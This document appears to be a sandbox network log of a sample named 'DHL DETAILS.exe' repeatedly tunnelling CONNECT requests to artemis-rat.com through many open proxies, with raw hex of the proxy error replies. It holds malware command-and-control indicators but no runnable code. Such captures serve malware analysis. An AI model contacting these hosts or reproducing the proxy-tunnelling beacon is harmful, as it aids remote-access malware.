Mar 9, 2024 13:14:19.895912886 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:20.536391020 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:21.224301100 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1604	192.168.2.5	54910	107.180.95.177	7128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.898211002 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:20.473929882 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:21.177397013 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:22.567601919 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:25.163888931 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:27.864520073 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.481827021 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:35.677983999 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1605	192.168.2.5	54963	104.20.235.179	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.898730040 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:20.053267956 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:19 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1606	192.168.2.5	53304	36.64.27.123	5678	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.937033892 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1607	192.168.2.5	54726	106.105.218.244	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.937040091 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1608	192.168.2.5	54943	38.54.95.19	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.937346935 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:22.157354116 CET	39	IN	HTTP/1.1 200 Connection established

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1609	192.168.2.5	54038	218.65.6.150	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.938361883 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:20.307547092 CET	704	IN	HTTP/1.1 502 Bad Gateway Server: huawei Date: Sat, 09 Mar 2024 12:01:40 GMT Content-Type: text/html Content-Length: 553 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 68 75 61 77 65 69 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center>huawei</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1610	192.168.2.5	54769	80.249.112.162	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.950077057 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:21.672277927 CET	343	IN	HTTP/1.1 400 Bad Request Server: nginx/1.14.0 (Ubuntu) Date: Sat, 09 Mar 2024 12:14:20 GMT Content-Type: text/html Content-Length: 182 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1611	192.168.2.5	54121	134.122.22.233	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.950218916 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1612	192.168.2.5	54819	185.110.190.99	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.950412035 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1613	192.168.2.5	54175	114.129.2.82	8081	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.950987101 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:22.973809958 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:23.238950014 CET	72	IN	HTTP/1.1 200 Connection established Proxy-Agent: Fortinet-Proxy/1.0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1614	192.168.2.5	54847	193.84.89.202	8443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.957827091 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1615	192.168.2.5	54834	1.15.62.12	5678	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.960251093 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:20.723980904 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1616	192.168.2.5	54760	51.161.131.84	58612	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.960444927 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1617	192.168.2.5	54233	50.63.12.101	32423	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.961898088 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1618	192.168.2.5	54261	162.214.191.59	58275	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.962061882 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1619	192.168.2.5	53935	180.250.159.49	4153	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.962068081 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1620	192.168.2.5	54852	37.235.53.208	6789	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.966207027 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:20.332730055 CET	339	IN	HTTP/1.1 403 Forbidden Server: squid/4.7 Mime-Version: 1.0 Date: Sat, 09 Mar 2024 12:14:20 GMT Content-Type: text/html;charset=utf-8 Content-Length: 5 X-Squid-Error: TCP_RESET 0 Vary: Accept-Language Content-Language: en X-Cache: MISS from proxy.wakoopa.com Via: 1.1 proxy.wakoopa.com (squid/4.7) Connection: keep-alive Data Raw: 72 65 73 65 74 Data Ascii: reset

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1621	192.168.2.5	54820	103.166.141.74	20074	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.969381094 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:20.332349062 CET	39	IN	HTTP/1.1 200 Connection established

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1622	192.168.2.5	54987	104.16.107.142	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.969384909 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:20.124131918 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:20 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1623	192.168.2.5	54822	120.37.121.209	9091	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.986418009 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:20.724045992 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:21.086081982 CET	325	IN	HTTP/1.1 400 Bad Request Server: nginx/1.12.1 Date: Sat, 09 Mar 2024 12:15:00 GMT Content-Type: text/html Content-Length: 173 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.1</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1624	192.168.2.5	54812	43.231.22.228	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.987297058 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1625	192.168.2.5	50277	167.99.131.11	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.994731903 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:23.145282984 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:26.177046061 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:29.156878948 CET	806	IN	HTTP/1.1 500 Internal Server Error Date: Sat, 09 Mar 2024 11:24:49 GMT Server: Apache/2.4.29 (Ubuntu) Content-Length: 614 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 77 65 62 6d 61 73 74 65 72 40 6c 6f 63 61 6c 68 6f 73 74 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at webmaster@localhost to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1626	192.168.2.5	54954	23.137.248.197	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.998344898 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1627	192.168.2.5	54997	104.27.12.22	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
